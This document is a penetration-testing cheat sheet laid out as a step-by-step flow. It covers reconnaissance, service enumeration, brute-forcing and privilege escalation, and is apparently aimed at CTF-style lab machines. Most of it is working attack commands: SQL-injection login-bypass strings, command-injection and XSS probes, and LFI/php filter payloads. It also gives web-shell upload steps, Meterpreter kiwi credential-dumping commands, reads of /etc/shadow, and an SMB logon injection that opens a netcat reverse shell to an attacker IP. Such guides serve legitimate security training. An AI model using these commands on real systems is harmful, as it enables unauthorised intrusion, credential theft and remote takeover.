HackFlow "The Process"

Documenting the process

more at apt-secure.ca

How to Use HackFLow

Treat Me To A Coffee

General Data:

  • wordlists in kali

    • /usr/share/metasploit-framework/data/wordlists

    • /usr/share/wordlists

      • /usr/share/wordlists/rockyou.txt <-- popular

      • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <--popular

  • python script for determining use of random port assignments link

  • GTFOBins:

    • "a curated list of unix binaries that can be used to bypass local security restrictions in misconfigured systems

      • cannot understate how valuable this resource is

  • Power Usage nmap:

    • searching for vulns for particular service

      • #ls /usr/share/nmap/scripts/ | grep smb | grep vuln

      • followed by

      • #nmap -p 139 --script smb* <IP> -oN <outputfilename>.txt

  • Finding files on target

    • #find / -name <filename_and_extension> 2>/dev/null

      • #find / -name *backup* 2>/dev/null

    • #find /home/ -type f -size 1033c -name "file_name.*"

  • #find / -type f -user root

  • #find / -type f -group root

  • read file with "-" at beginning

    • #cat < file.txt


Binwalk is a tool for searching a given binary image for embedded files and executable code

  • #binwalk -e <file>

Beginning of Hack Flow

  • VPN on?

  • Have you switched VPN locations?

  • are you using proxychains? link1 link2 link3

  • ping target

    • yes: continue

    • no: check connection

      • try port scans with sA, experiment with -Pn -n

      • go back and check network

      • be aware that you may still have connection however a FW could be stopping ICMP packets

Initial Interaction

  • Consider adding target IP to /etc/hosts for expedited work (so you are not typing the IP address in a ton)

    • see image below

  • #nmap -sS -T4 target

    • save results. I do this first to get a general idea of what I am looking at

  • #nmap -sU -sV -top-ports=20 <IP>

    • many services utilize UDP. If you don't do a UDP scan you will miss them

  • #nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <IP>

  • #nmap -sV -sC target

    • grab service versions and any initial default script output

  • #nmap -sV --script vulners.nse target

    • this can come back with a ton of information. Can feel like a shotgun approach however it can provide good direction

    • output can be large-->recommended output to file (-oN)

  • Leverage the entire vuln database of nmap

    • #nmap --script vuln <IP>

    • /usr/share/nmap/scripts/script.db -->is a local DB that list all the vulnerabilities and exploits (scans) available to nmap

    • see "General Data" for power usage

  • Put IP in URL, attempt to connect. Use discovered ports.

    • Dealing with a WebApp? Go to "WebApp" below

  • Searching Kali for discovered services

Add IP to /etc/hosts so you can use a given name in our pentest


reference link

initial interaction

We want to find information like domain.

is DNS running TCP or UDP? (TCP is an oopsie doopsie)

banner grab

  • #nmap -sSU -p 53 --script dns-nsid a.htb

Domain info gathering

  • #nslookup

  • #server <IP>

  • #<IP>

zone transfer (add domain the /etc/hosts)

  • #dig axfr <domain name> @IP

    • zone transfer works

      • add new nameservers to your /etc/hosts

      • subdomain brute force

        • #gobuster dns -d <domain name> -w /usr/share/wordlists/all_dns.txt -t 100

          • huge subdomain list can be found here link

          • DNS SecLists link (I use bitquark-subdoamins-top100000.txt)

other nmap

  • #nmap --script fcrdns <IP>

  • #nmap --script dns-srv-enum <IP>

  • #nmap --script dns-random-txid <IP>

  • #nmap --script dns-random-srcport <IP>

  • Enumeration

    • dnsenum <domain>

    • dnsrecon -d <domain>

Fix: Your client may not be set up to work with older SMB versions. allow your client to do so.

add the above line to /etc/samba/smb.conf


Program used to find information about computer users. Can list login name, full name, and potentially other details about users. Default port is 79


Banner Grab

  • #nc -vn <IP> 79

  • #echo "root" | nc -vn <IP> 79


Use multiple options, metasploit doesn't always catch every name. Additionally the quality of your wordlist makes a difference. Use SecLists

  • ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t


  • #finger <username>@<IP>


  • #use auxiliary/scanner/finger/finger_users


  • general connect(banner grabbing). you can find out service version easily

    • #ftp <IPADDR>

  • test anonymous login link

    • This will feed you directory listings.

      • #nmap -sV -sC <IPADDR> -p21

  • Try to login

    • #ftp <IPAADR >21

      • use some default creds like

        • anonymous/anonymous

        • admin/admin

        • root/root

        • empty/empty

        • Anonymous allowed?

          • yes (follow these steps, or continue down to "Access Gained")

            • examine all available files for critical info (creds)

            • use #ls -la to determine if you have c:/ access (windows)

            • Do you have C:/ access?

              • yes

                • continue to FTP Priv Escalation

          • no

            • you can attempt brute force

-metasploit anonymous login check link

-ftp brute force


Access Gained:

  • this means that you either are able to log in with acquired user credentials or can navigate with anonymous

  • The FTP may have nothing of value, however depending on what is in there you may want to consider uploading a file (like a web shell)

    • video demo

    • asp.net present

    • from attacker (method 1)

      • #locate cmd.aspx

      • #cp <path/file> <wherever_you_want_it>

      • connect with ftp

      • #put <file>

      • open browser on attacker

        • http://<IP>/<file you put>

        • worked?

          • yes

    • method 2 (upload reverse shell aspx)

      • follow link for instructions link


general ftp

client side commands link


Enumeration (resource)

  • #nmap -n -sV --script "ldap* and not brute" <IP>

  • Check for null credentials or if your credentials are correct

    • #ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"

Local Enumeration -> Privilege Escalation


  • get users

    • #net users

    • Identify info on specific user

      • #net user <user name>

  • get hostname

    • #hostname

  • find groups

    • #whoami /groups

  • Retrieve all users

    • #wmic useraccount get name

  • look at user specific details (Are any users included in the admin group)

    • #net user <username>

  • look at networking (interfaces,routing table etc.)

    • #ipconfig /all

    • #route print

  • look at arp cache

    • #arp -A

  • look at network connections and firewall rules

    • #netstat -ano

    • #netsh firewall show state

  • Look at scheduled tasks (may need elevated permissions)

    • #schtasks /query /fo LIST /v

  • Analyze running processes to started services

    • #tasklist /SVC

  • look at systeminfo.exe

    • check out this page for power usage link

    • What kind of things are we looking for?

      • patches

      • OS Version

      • Original install time

      • BIOS Version

      • network cards (pivots)

  • Determine .NET versions

    • #reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

    • Can also look up directories

      • #cd c:\Windows\Microsfot.NET\Framework

      • #dir

  • Find third party drivers

    • #driverquery /v

  • check AppData

    • cd C:\Users\<username>\AppData\

      • ..\Roaming

Post Exploitation(Meterpreter)

    • You have exploited the machine and have a meterpreter shell

  • load kiwi extension try to get credentials

  • #load kiwi

  • kiwi commands

    • creds_all: retrieve credentials

    • creds_kerberos

    • creds_msv

    • creds_ssp

    • creds_tspkg

    • creds-wdigest

    • dcsync: retrieve user account info via dcsync

    • dcsync_ntlm

    • golden_ticket_create: create a golden kerberos ticket

    • kerberos_ticket_list

    • kerberos_ticket_purge

    • kiwi_cmd

    • lsa_dump_sam

    • lsa_dump_secrets

    • password_change

    • wifi_list: list wifi profiles/creds for current user

    • wifi_list_shared

    • obtained account password?

  • yes

    • attempt remote login


  • Important scripts: linPEAS.sh / linux-exploit-suggester.pl > Instructions here

  • important commands

    • whoami/id/hostname/uname/pwd/ifconfig/ip/netstat/ss/ps/who/env/lsblk/lsusb/lsof/lspci/hostname

  • Look at history

    • #history

  • If you have determined through looking in history that a particular application has been run. see if the application is currently running #ps aux | grep <pattern> The application could possibly be a ROOT level application

    • Patterns to check

      • "-exec"

      • "root"

  • print system info

    • #uname -a

  • kernel release

    • #uname -r

  • find users with group "0"

    • #grep 'x:0:' /etc/passwd

  • look at scheduled tasks

    • #crontab -e


  • #~/.bash_history

  • #cat /etc/passwd

  • #cat /etc/shadow

"find" Power Usage

  • #find / -name <filename_and_extension> 2>/dev/null

  • #find -type f -name "*.bak" 2>/dev/null

  • #find -type f -name "*.log" 2>/dev/null

get OS info

    • #(cat /proc/version || uname -a ) 2>/dev/null

  • get ENV variables (can contain API keys the env variable)

    • #(env || set) 2>/dev/null

find SUID binary

SUID binary exploitation involves a binary with it sSUID bit set so that any thing executed by the program will do so with privileges of that user. Research each application that comes up.

  • #find / -perm -4000 2>/dev/null

    • Find SUID

      • #find / -perm -u=s -type f 2>/dev/null

    • Find GUID

      • #find / -perm -g=s -type f 2>/dev/null

Discover established connections (PORT) reference

#cat /proc/net/tcp

World writable Scripts invoked as root

  • if you find a script that is owned by root but is writable by anyone you can add your own malicious code

  • World writable files directories

    • #find / -writable -type d 2>/dev/null

    • #find / -perm -222 -type d 2>/dev/null

    • #find / -perm -o w -type d 2>/dev/null

  • World executable folder

    • #find / -perm -o x -type d 2>/dev/null

  • World writable and executable folders

    • find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

  • examine file capabilities(start with root " / " )

    • #getcap -r / 2>/dev/null

      • if you find cap_setuid as a binary go here


  • link showing early steps (including steps below for RPC)

    • follow link above to see instructions on grabbing /etc/passwd and /etc/shadow and using JTR to crack password

    • additionally there are further instructions on adding yourself to sudoers (priv esclation)

  • RPC Bind Hack (potentially port 111)

    • #nmap -p111 --script nfs* <IP>

    • Do you see a mount point?

      • yes

        • make a directory #mkdir myDemo

        • #sudo mount -o nolock <IP>:<mount_point> <location_of_myDemo>

        • if successful you can now navigate to this share


  • Exploit tutorial here

  • from nmap scan you have open

    • 139/445 netbios-ssn

    • 445/1433 typically associated with file sharing (SMB)

    • get version

  • searching for vulns for particular service

    • #ls /usr/share/nmap/scripts/ | grep smb | grep vuln

  • nmap scan

    • #nmap -p 139 --script smb* <IP>

      • could take time because it is running all the smb scripts available

  • enumerate users

    • #nmap --script smb-enum-users.nse -p445 <IP>

  • enumerate shares

    • #nmap --script smb-enum-shares.nse -p445 <IP>

    • variation of above scan

      • #nmap -p 445 -Pn -n --open --script=smb-enum-users --script-args=smbnoguest <IP>

  • Brute

    • #hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt <IP> smb

  • Attempt a mapping first (list shares)

    • #smbmap -H <IP>

    • try this as well. "0xdf" sends an error code

      • #smbmap -H a.htb -u "0xdf -p"0xdf

  • use rpcclient to check for Null Sessions

    • #rpcclient -U "" -N <IP>

  • Gather more information with enum4linux

    • #enum4linux -a target_ip

  • Check for remote shares

    • #smbclient -L //target_ip

      • if it shows you shares you this is good!

  • Check anonymous access

    • #smbclient -N -L \\\\IP\\

      • anonymous allowed?

        • yes(linux)

          • look at files and pick one, do this for all (ex.backups)

            • #smbclient -N \\\\IP\\backups

            • #smbclient -N //<IP>/<share_name>

              • can you connect to the share?

                • yes

                  • attempt reverse shell

                  • set up listener on attacker #nc -nlvp 4444

                  • while connected to smb --> #logon "/=`nc <attacker IP> 4444 -e /bin/bash`"

    • Vuln Discovery

      • #nmap -p 445 -script vuln a.htb

    • Credentials acquired?

      • yes

        • #smbmap -H <IP> -u name_of_user -p "this is the password use escape for special characters"

        • you can navigate through discovered drives

        • #smbmap -H <IP> -u name_of_user -p "password\!\!" -r C$

          • the above sample C:/ Drive was discovered to be Read/Write

        • smbclient connect

          • #smbclient \\\\IP\\DIRECTORY -U=<username>%<password>

        • Use evil-winrm

            • enumerate through windows services (see bottom of page)

          • #gem install evil-winrm

          • #evil-winrm -i <IP> -u <username> -p '<password>'

            • available commands when successful

              • upload/download/services/menu

    • upload

      • curl --upload-file <file> -u '<user>' smb://<IP>/<sharename>/


General SAMBA



simple network management protocol

service discovery

  • #nmap -sU -sV -top-ports=20 <IP>


  • #nmap <IP> -Pn -sU -p 161 --script=snmp-brute

  • #nmap <IP> -Pn -sU -p 161 --script=snmp-interfaces


  • #snmpwalk -c public <IP> -v1 >> snmpwalk_output.txt

  • #cat snmpwalk_output | grep STRING


Brute Force

  • #hydra -s 2222 -l <username> -P <path to wordlist> <IP> -t 4 ssh

    • -l = single user name

      • -L = to use word list for user names

    • -P = path to wordlist

    • -t 4 number of threads (brute force can take a long time, so leverage your resources)

    • -s = changing the port(not all ssh is 22, default for hydra is 22)

  • If you have acquired an rsa file you should attempt to crack the hash


Try telnet on different ports

Brute Force (metasploit)

  • Process can be extremely long. You are better served to attempt to enumerate existing users and brute on that list.

  • # use auxiliary/scanner/telnet/telnet_login

    • #set rhosts

    • #set pass_file /usr/share/wordlists/rockyou.txt

    • #set user_file /Seclists-master/Usernames/Names/names.txt

    • #set threads 3 (or more if you want)

    • #run


Information Gathering

  • dealing with tomcat?

  • No matter what web application you are working with. Go and find the default credentials and try them out

  • Look at page source-->does anything jump out?

  • Conduct information gathering

    • click on everything and observe changes in the URL.

    • modify the URL and see if anything changes.

  • you have a port open up browser insert IP:port

  • navigate around to all pages

  • insert single quote in forms to see if it is "easy" vulnerable to sql injection

  • attach "/sites/" to end of IP to see if you see anything

  • See if any errors are thrown with netcat

    • nc <IP> 80

    • GET / HTTP

  • Additionally you can use curl to the same end

  • use ZAP to crawl and to investigate GET and POST

    • doesn't find everything, but is a good initial interaction with webapp.

    • ZAP also has Alerts which can potentially point you the right direction

  • connect to webapp with burpsuite and proxystep. Observer all GET and POST

  • in terminal run

    • #whatweb target.url -> this will tell you technologies/services associated with the site

  • Vulnerability Scanning

  • #nikto -h target_ip

    • put header info into google > " "header_info" cve"

  • Vulnerability scan with nuclei (found on tools page)

    • #nuclei -u http://<IP> 130

  • Check for Web Application Firewall Fingerprinting

    • wafw00f

      • #wafw00f http://<IP>

  • Directory Enumeration

    • nmap scan

      • nmap --script http-enum -v -p80 <IP>

    • DIRB

      • #dirb http://xyz.com -r -z 10

        • -r = non recursive

        • -z = 10 millisecond delay

      • use "dirbuster" gui> look at tools for set up

    • Gobuster

    • gobuster cheat sheet link

    • after you discover directories put the new data into URL and click on everything

    • use different wordlists */usr/share/wordlists" download more if needed

    • wordlists that have worked (take note that this is brute force, so the size of the file increases the options attempted)

      • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

      • /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

      • as you find more directories "/wordpress" etc. enumerate the new directory

    • #gobuster dir -u -w /usr/share/wordlists/YOUR_WORD_LIST_OF_CHOICE.txt -t 100

      • additional switches to add (being specific can help you discover exposed directories faster)(if you know that php is present run the command below!)

        • #gobuster dir -u -w /usr/share/wordlists/WORDLIST.txt -e -s "200,301,302,401" -x "php" -t 100

          • -x specifies extentions

          • -s string to look for

          • -e specify extended mode that renders the full URL

          • #gobuster dir -u -w /usr/share/wordlists/WORDLIST.txt -x html,txt,php -t 100

      • Webservers can have multiple virtual hosts

        • discover other virtual hosts

        • #gobuster vhost -u http://<name>.htb -w /usr/share/wordlists/subdomain_list.txt -t 150

          • you need to have a subdomain wordlist to make this work go here for lists

  • Webdav

  • Test for webdav (link) is an extension of HTTP that allows clients to perform remote web content authoring.

    • run this scan

    • #nmap --script http-webdav-scan -p80,8080 a.htb

    • using metasploit

      • #use scanner/http/webdav_scanner

        • #set rhosts

        • #set path

        • #run

      • #use scanner/http/options

        • #set rhosts

        • #run

    • run davtest (tests to see what kinds of files can be uploaded)

      • #davtest -url http://<IP> (davtest can be wonky, however if your scanner returned with positive for webdav it's worth further digging

      • #cadaver <ip> a command land webdav editor

        • commands (ls/cd/get/mget/put/mput)

        • access gained?

          • yes

      • You can use curl to upload files to a webdav vulnerable site link

    • Test for Heartbleed

      • #nmap -p 443 --script ssl-heartbleed <IP>

    • Wordpress

      • #wpscan --url http://<IP>

      • #wpscan --url http://<IP> -e ap,t,tt,u

      • ap = all plugins

      • t= themes

      • tt=timthumbs

      • u=users

    • Check default plugins folder in URL

    • Check for xmlrpc.php vulnerability

      • can be discovered through directory enumeration but also by putting xmlrpc.php at the end of the URL

      • reference here

Testing User Inputs

  • Try manual testing SQL injections (see below)

  • open up "inspect element">network>click submit button with data in fields >observe any changes

  • manually testing inputs is first step but it could be time to use burpsuite

  • open BurpSuite>start proxy browser(intercept on)>step through website and observe changes (link)

    • POST has base64 data?

  • Test Command Injection

    • php may be working in the background

    • try putting a ; at the end of the known good input and putting a command like ;whoami

      • without proper sanitization you can potentially be shown data you shouldn't know

        • #cat /etc/passwd

        • #cat /etc/shadow

        • #ls /

  • Test Stored XSS Vuln

    • Use javascript special characters to see if you can cause an error, or test if they are allowed which means we could be looking at a XSS

      • ";<>

      • "

      • <

      • >

      • ;

      • also

      • <script>alert('XSS')</script>

  • Cookie Forgery

    • You could have an opportunity for Cookie forgery. Follow video link for BASIC cookie session forgery

Accessed Gained

What is in /var/www? Does your current user have control of this directory? Can you upload anything that could escalate privileges?

  • consider the python httpserver in tools

  • check permissions #ls -la

  • do local enumeration (linux/wndows) what binaries run at an admin level

SQL Injections Manual

Manual Checking

  • open firefox

  • right click submit button>inspect element

    • network>All>form data

    • document the format for the form

    • attempt brute force (see hydra for basic usage)

    • #hydra -s -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&:invalid"

Manual Testing (both user/pass, user only, pass only) link

Login Bypass

  • admin' --

  • admin' -- -

  • admin' #

  • admin'/*

  • ' or 1=1--

  • ' or 1=1#

  • ' or 1=1/*

  • ') or '1'='1--

  • ') or ('1'='1--

  • user' or 1=1;#

  • user' or 1=1 LIMIT 1;#

  • user' or 1=1 LIMIT 0,1;#

Finding Command Execution

  • you have found a form that sends a command.

    • is target OS Linux?

      • yes

        • stack a command onto the end of an expected command

          • put a ";" (semicolon) at the end of command and put "whoami" see what happens

terminal in browser

  • grab list of any/all users

    • #cat /etc/passwd

      • you may need to switch users

  • depending on user permissions

    • get python version

      • $whereis python

    • poke around for user flag

    • run #sudo -l (this will tell you what commands you can do)

    • attempt python priv escalation from terminal link

    • be aware that more is available to you with an upgraded shell. here are instructions to upgrade your shell using python link

SQL Injections Automated

Check if a database is running. Below commands also check if if webapp is vulnerable to a sqli

#sqlmap -u http://<IP> --dbs --batch

#sqlmap -u http://<IP>:8080 --dbs --batch --->depends on where the webserver port

#sqlmap -u http://<IP>/specific_location/ --dbs --batch

Discovered table(s)

#sqlmap -u http://<IP> -D <table_name> --dump-all --batch


you have a php page and you suspect that it can accept a GET or POST parameter. (resource)

you can brute force discover a parameter with wfuzz

#wfuzz -u http:<IP>/<suspect_page>.php?FUZZ=/etc/passwd -w /Seclists-master/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0

**parameter discovered?

  • yes

    • in your browser

      • #http:<IP>/<suspect_page>.php?<discovered_parameter>=/etc/passwd

      • did it work?

        • yes

          • great

        • no

          • attempt base64 decoding

            • #http://<IP>/<suspect_page>?<parameter>=php://filter/convert.base64-decoder/resource=/etc/passwd